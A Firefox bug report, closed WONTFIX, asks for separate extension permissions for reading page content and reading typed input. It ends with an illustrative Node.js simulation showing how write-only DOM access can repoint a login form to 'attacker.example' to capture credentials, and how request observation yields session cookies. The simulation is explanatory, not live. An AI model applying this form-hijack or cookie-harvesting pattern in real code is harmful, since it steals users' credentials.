Closed Bug 1579644 Opened 6 years ago Closed 6 years ago

Separate APIs for reading page data vs reading what I type into the page

Categories: WebExtensions :: Untriaged, enhancement
Version: 69 Branch
Type: enhancement
Priority: Not set
Severity: normal
Tracking: (Not tracked)
Status: RESOLVED WONTFIX
People: Reporter: jonathan; Assignee: Unassigned

Details

User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0

Steps to reproduce:

I tried to install Ghostery, an ad blocker that has good reviews. After selecting Ghostery, I checked the permissions, then the Firefox documentation for the requested permissions.

Actual results:

Ghostery asks for "Access your data for all websites" because it needs to read the website content to know what part of it is an ad to be blocked. However, the "Access your data for all websites" permission also grants an extension the permission to read all the data I enter into websites, such as my usernames and passwords (reference: https://support.mozilla.org/en-US/kb/permission-request-messages-firefox-extensions?as=u&utm_source=inproduct#w_access-your-data-for-all-websites).

Expected results:

To improve user privacy, these should be two separate permissions -- read website content, and read what I type into a website. Ad blockers only need to read website content, they don't need to know what I type into a website. Password managers need both (so they can detect form fields, automatically pick up a password I type and prompt me to save it).

Thanks for the report; let's triage this issue on the WebExtensions component for a proper evaluation.

Product: Firefox → WebExtensions
Version: 69 Branch → Firefox 69

> To improve user privacy, these should be two separate permissions -- read website content, and read what I type into a website. Ad blockers only need to read website content, they don't need to know what I type into a website. Password managers need both (so they can detect form fields, automatically pick up a password I type and prompt me to save it).

Unfortunately, it is not that simple. Implementing a split with a "read only content" mode would break virtually all extensions, including adblockers, which need to modify pages in order to block certain elements. Any extension which is allowed to change the DOM would be able to read it by definition, but even if we somehow managed to prevent that, it could augment the page in a number of ways to exfiltrate user data.

Additionally, just observing web requests is more than enough to snoop on session cookies and access users' credentials that way.

In short, this is not a feasible solution, and we're instead focusing on other approaches to the privacy/security issues, namely: recommended extensions (which go through a more involved review process), more declarative APIs, and more specific host permissions handling (as part of Google's Manifest V3 work).

Status: UNCONFIRMED → RESOLVED
Closed: 6 years ago
Resolution: --- → WONTFIX
Version: Firefox 69 → 69 Branch
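As an added illustration of the two points made in the closing comment (this is example code written for this page, not code from the bug, from Ghostery or from Firefox), the following Node.js model stands in for a page with a login form, a hypothetical "write-only" DOM handle of the kind the reporter asks for, and the browser's own form submission. The page, the origins, the cookie value and the credentials are all constructed; the functions do not use the real WebExtensions API.

```javascript
// Constructed model (not the WebExtensions API) of the two points in the
// WONTFIX comment: (1) an extension holding only *write* access to the DOM
// can still exfiltrate what the user types, because the browser performs the
// network request that carries form data; (2) an extension that merely
// observes outgoing requests sees session cookies.

// Minimal page model: a login form the user will fill in, plus the browser's
// cookie jar for the page origin. All values are constructed for the example.
function makePage() {
  return {
    origin: "https://bank.example",
    cookies: "session=abc123",
    form: {
      action: "https://bank.example/login",
      method: "POST",
      fields: { user: "", password: "" },
    },
  };
}

// The "split" permission the reporter asks for: a DOM handle with setters only.
// Nothing here returns page content or field values to the extension.
function writeOnlyDom(page) {
  return {
    setFormAction(url) { page.form.action = url; },
  };
}

// The browser's side: the user types into the form and submits it. The request
// goes to form.action; cookies are attached only for same-origin destinations.
function typeAndSubmit(page, network, user, password) {
  page.form.fields.user = user;
  page.form.fields.password = password;
  const sameOrigin = new URL(page.form.action).origin === page.origin;
  const request = {
    url: page.form.action,
    method: page.form.method,
    headers: sameOrigin ? { Cookie: page.cookies } : {},
    body: new URLSearchParams(page.form.fields).toString(),
  };
  network.push(request);
  return request;
}

// Point (1): a content script limited to the write-only handle repoints the
// form at a server it controls (attackerUrl is a hypothetical collector). It
// never reads the DOM; the user's own submission carries the credentials out.
function exfiltrateViaFormAction(attackerUrl) {
  const page = makePage();
  const network = [];
  writeOnlyDom(page).setFormAction(attackerUrl);
  typeAndSubmit(page, network, "alice", "hunter2");
  return network[0];
}

// Point (2): an observer with webRequest-style visibility into outgoing
// requests (headers only, no DOM access at all) collects session cookies
// from the page's legitimate same-origin traffic.
function observeCookies() {
  const page = makePage();
  const network = [];
  typeAndSubmit(page, network, "alice", "hunter2");
  return network
    .filter((r) => r.headers.Cookie)
    .map((r) => ({ url: r.url, cookie: r.headers.Cookie }));
}

// Standalone usage: `node` this file to print both leaks.
if (typeof require !== "undefined" && typeof module !== "undefined" && require.main === module) {
  console.log(exfiltrateViaFormAction("https://attacker.example/collect"));
  console.log(observeCookies());
}
```

The point of the model is that neither leak needs a "read what I type" primitive: in the first case the only extension operation is a single attribute write, and the typed password leaves in the body of a request the browser builds; in the second the extension never touches the page at all and still obtains the session cookie. Real content scripts have many more write paths than a form action (injected scripts, event handlers, image beacons), which is why the comment calls a read/write split infeasible rather than merely hard.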